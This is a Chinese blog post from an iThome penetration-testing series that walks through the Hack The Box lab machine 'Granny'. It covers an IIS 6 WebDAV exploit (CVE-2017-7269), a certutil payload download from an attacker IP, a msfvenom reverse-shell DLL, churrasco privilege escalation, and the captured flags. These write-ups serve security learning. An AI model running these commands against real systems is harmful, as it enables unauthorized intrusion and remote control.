[Day25] HTB Granny - iT 邦幫忙::一起幫忙解決難題，拯救 IT 人的一天

2021 iThome 鐵人賽

DAY 25

0

Security

我想學滲透測試喵喵喵喵！！！！系列第 25 篇

[Day25] HTB Granny

13th鐵人賽

團隊飛天小女警

2021-10-10 18:58:00

1422 瀏覽

分享至

URL : https://app.hackthebox.eu/machines/14
IP : 10.129.2.63

Recon

觀察首頁
- IIS 6
nmap 掃 port
- nmap -A -p80 10.129.2.63
掃目錄
發現一些奇怪的 dll
- http://10.129.2.63/_vti_inf.html
- FPAuthorScriptUrl="_vti_bin/_vti_aut/author.dll"
- FPAdminScriptUrl="_vti_bin/_vti_adm/admin.dll"
- TPScriptUrl="_vti_bin/owssvr.dll"

Exploit

https://github.com/g0rx/iis6-exploit-2017-CVE-2017-7269
nc 收 shell
確認使用者
systeminfo
送 windows-exploit-suggester.py
測 CVE-2015-1701
- https://github.com/hfiref0x/CVE-2015-1701
- certutil -urlcache -f http://10.10.16.35/Taihou32.exe Taihou32.exe
- impacket-smbserver meow .
- copy \\10.10.16.35\meow\Taihou32.exe Taihou32.exe
- shell 卡住不能用 QQQ

提權

準備 shell
- msfvenom -p windows/shell_reverse_tcp LHOST=10.10.16.35 LPORT=7878 -f dll > s.dll
- rundll32 s.dll
churrasco
- churrasco.exe -d "shellx86.exe"
nc 收 shell
User flag
- 700c5dc163014e22b3e408f8703f67d1
Root Flag
- aa4beed1c0584445ab463a6747bd06e9

[Day24] HTB Devel

[Day26] HTB Jerry

系列文

我想學滲透測試喵喵喵喵！！！！共 30 篇

目錄

RSS系列文訂閱系列文

30 人訂閱

完整目錄

直播研討會

{{ item.subject }}

{{ item.channelVendor }} {{ item.webinarstarted }} |

{{ formatDate(item.duration) }}

直播中

尚未有邦友留言

立即登入留言

參賽組數

1064 組

團體組數

40 組

累計文章數

22199 篇

完賽人數

602 人

15th鐵人賽 16th鐵人賽 13th鐵人賽 14th鐵人賽 12th鐵人賽 11th鐵人賽鐵人賽 2019鐵人賽 javascript 2018鐵人賽 python 2017鐵人賽 windows php c# windows server linux css react vue.js

IT邦幫忙